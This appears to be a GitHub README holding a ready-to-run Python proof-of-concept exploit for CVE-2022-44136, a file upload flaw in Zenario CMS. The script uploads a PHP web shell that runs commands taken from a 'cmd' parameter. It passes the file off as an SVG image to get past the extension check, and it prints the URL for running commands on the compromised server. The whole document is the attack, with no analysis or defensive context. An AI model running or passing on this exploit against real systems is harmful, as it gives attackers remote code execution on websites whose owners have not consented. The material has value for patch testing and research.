README.md
Rendering markdown...
#!/usr/bin/env python3
# CVE-2022-44136 Exploit - Zenario CMS Arbitrary File Upload
# Author: Ch35h1r3c47 (https://github.com/Ch35h1r3c47)
import requests
import sys
import argparse
import urllib3
# Disable warnings for self-signed certificates
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
def exploit(target_url, command):
"""
Attempts to upload a PHP shell to the Zenario CMS instance
by spoofing the MIME type as image/svg+xml.
"""
endpoint = "/zenario/ajax.php?method_call=handlePluginAJAX&cID=1&slideId=0&cType=html&instanceId=20&fileUpload"
url = target_url.rstrip('/') + endpoint
filename = "debug_module.php"
# PHP payload to execute system commands via 'cmd' GET parameter
payload = f"<?php system($_GET['cmd']); ?>"
# Constructing the multipart/form-data request
# The vulnerability lies in the bypass of extension checks via MIME type spoofing
files = {
'Filedata': (filename, payload, 'image/svg+xml')
}
print(f"[*] Targeting: {target_url}")
print(f"[*] Uploading malicious file: {filename}")
try:
response = requests.post(url, files=files, verify=False, timeout=15)
if response.status_code == 200:
print("[+] Request sent successfully.")
print("[+] Server Response:")
print("-" * 30)
print(response.text)
print("-" * 30)
print("[!] Check the server response for the uploaded file path.")
print(f"[*] Suggested test: /path/to/uploaded/{filename}?cmd={command}")
else:
print(f"[-] Upload failed. Status Code: {response.status_code}")
except requests.exceptions.RequestException as e:
print(f"[-] Connection error: {e}")
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Exploit PoC for CVE-2022-44136")
parser.add_argument("-u", "--url", required=True, help="Target Base URL (e.g., http://target.com)")
parser.add_argument("-c", "--cmd", default="whoami", help="Command to execute (default: whoami)")
args = parser.parse_args()
exploit(args.url, args.cmd)